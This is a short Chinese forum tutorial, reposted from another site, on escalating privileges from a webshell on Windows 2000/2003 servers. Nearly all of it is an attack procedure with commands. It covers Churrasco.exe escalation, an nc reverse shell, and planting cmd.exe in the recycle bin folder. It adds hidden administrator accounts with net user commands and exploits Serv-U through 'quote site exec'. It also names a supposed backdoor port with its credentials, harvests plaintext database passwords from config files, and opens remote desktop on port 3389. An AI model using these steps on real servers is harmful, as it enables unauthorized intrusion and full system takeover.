webshell提权
作者:唐钰小宝 本文由p9′blog转自华夏论坛
原文地址:http://bbs.77169.com/read-htm-tid-239508-fpage-5.html
1.看命令行组件是否存在wscript.shell
2.看系统版本,权限大就直接在C盘看,cmd下,set命令看下就OK!windows的为03,WINNT的为2000
3.看系统的FTP是否是SEVR-U,看sevr-u版本,cmd下ftp www.xxx.com,当然也有改了的,可以在webshell里扫下43958(小敲门:扫下65500,ftp提权的后门,可以用ftp www.xxx.com 65500进去,账号go,密码od)
4.存在命令行组件,并且是03系统,先看下是否支持aspx,aspx里面不需要命令行组件的噢..用Churrasco.exe溢出即可….不能溢出,试试nc反弹个cmdshell,权限可能会大点!
5.上传cmd.exe,首选目录回收站C:\RECYCLER\,备选目录,C:\Documents and Settings\All Users\Documents\,C:\Inetpub\,网站目录!
6.执行命令,cmd路径选择上传后的路径,如:C:\RECYCLER\cmd.exe!添加用户格式:C:\RECYCLER\Churrasco.exe “net user 账号 密码 /add” | C:\RECYCLER\Churrasco.exe “net localgroup administrators 用户 /add”
7.sevr-u提权,,端口43958,webshell自带一个SU-FTP通杀那个就是,然后cmd下,ftp www.xxx.com 如果能够用添加的ftp用户登录上去,那么执行quote site exec net user 用户 密码 /add 和quote site exec net localgroup administrators 用户 /add ,就行!
8.mysql提权,在网站目录寻找conn.asp web.config 之类的网站配置文件,如果网站是mysql架设,里面会有明文账号密码,得看运气了,可能有添加用户权限!
9.查看系统终端端口(默认3389),有命令行情况下,首先执行命令Tasklist/SVC查看服务进程PID值,TermService对应的PID值即终端端口PID值,然后用netstat -ano命令查看端口对应的PID值,跟TermService服务PID值对应下就可以找出终端端口,无命令行情况下可以用读取注册表来得到,前提是有一定权限,HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Wds\rdpwd\Tds\tcp键值PortNumber读取注册表,aspx权限大点,读取几率很高!
10.开启系统终端端口,有命令行情况,上传3389.exe(03系统)执行如:C:\RECYCLER\Churrasco.exe ” C:\RECYCLER\3389 0 3389″ 前一个3389是是文件名,后一个3389是终端端口!如果修改过终端端口,那么后一个3389就也需要修改!sevr-u也同样可以,quote site exec C:\RECYCLER\3389 0 3389 !执行木马一样!
